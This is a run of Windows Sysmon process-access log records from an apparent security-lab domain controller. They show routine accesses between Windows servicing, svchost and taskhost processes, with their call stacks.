13:58:31.195{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011557Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.195{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011556Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.195{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011555Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.195{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011554Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.195{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011553Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.195{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011552Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.195{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011551Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.195{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011550Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.195{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011549Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.180{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011548Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.180{59A5CD1D-93F9-6005-F504-00000000A301}1756872C:\Windows\system32\taskhostw.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011547Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.180{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011546Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.180{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011545Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.164{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011544Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.164{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011543Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.164{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011542Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.164{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011541Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.164{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011540Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.148{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011539Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
